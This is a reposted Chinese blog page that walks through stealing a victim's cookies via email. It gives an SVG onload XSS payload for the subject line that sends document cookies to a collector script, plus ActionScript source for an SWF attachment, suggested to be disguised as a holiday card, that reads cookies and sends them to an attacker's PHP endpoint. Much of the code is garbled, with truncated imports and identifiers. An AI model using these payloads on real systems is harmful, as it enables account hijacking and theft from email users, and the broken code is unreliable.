给受害者发送主题如下的邮件:
<svg onload='img=new Image();img.src="///geo.php?get="kie;'>
当受害者试图打开邮件时,cookie将会被窃取:
将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):
swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):
package {al.ExternalInterface;import flash.display.Sprite;import flash.display.Sprite;import flash.events.Event;import flash.URLLoader;import flash.URLRequest;TextField;TextFieldAutoSize;l.*;import flash.events.IOErrorEvent;import flash.events.*;import flash.*;/*** @author User*/public class csrf extends Sprite {private var loader:URLLoader;public function csrf() {var res:String = ExternalInterface.call("function(){kie;}"); doGet(res);}private function doGet(res:String):void{loader = new URLLoader();var target:String = ".php?get="+res; var request:URLRequest = new URLRequest(target);try {loader.load(request);} catch (error:Error) {sendDatatoJS("Error: " + StackTrace()); }}private function sendDatatoJS(data:String):void{trace(data);ExternalInterface.call("colsole.log", data); }}}
一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点。
转载于:.html
本文发布于:2024-02-01 13:08:58,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170676414036818.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |